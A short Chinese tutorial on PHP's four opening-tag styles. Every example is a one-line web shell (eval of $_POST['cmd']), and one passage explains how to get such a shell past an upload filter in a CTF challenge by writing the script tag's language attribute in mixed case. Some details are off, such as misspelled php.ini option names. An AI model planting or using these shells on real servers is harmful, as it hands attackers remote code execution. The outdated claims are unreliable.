PHP的標識有哪幾種

PHP的標識有4種風格

XML風格 （推薦學習：PHP視訊教學）

<?php
eval($_POST['cmd']); 
?>

php推薦使用的標記風格。

伺服器管理員無法禁用，所有伺服器上均可使用該風格。

指令碼風格

<script language="php">
    eval($_POST['cmd']);
</script>

預設開啟，無法禁用

筆者曾遇到過一CTF題目，要求上傳shell，但是卻對檔案內容做了過濾 ，<? 以及 php，替換為了空格。此種風格中，language的值，大小寫都可以，因此可以構造如下程式碼進行繞過

<script language="PhP">
    eval($_POST['cmd']);
</script>

簡短風格

<? 
eval($_POST['cmd']);
?>

此種風格需要在組態檔php.ini中啟用short_open_tage選項

此種風格在許多環境中預設是不支援的

ASP風格

<% 
eval($_POST['cmd']);
%>

此種風格需要在組態檔php.ini中啟用asp_tag選項

在預設情況下是禁用的

以上就是PHP的標識有哪幾種的詳細內容，更多請關注TW511.COM其它相關文章！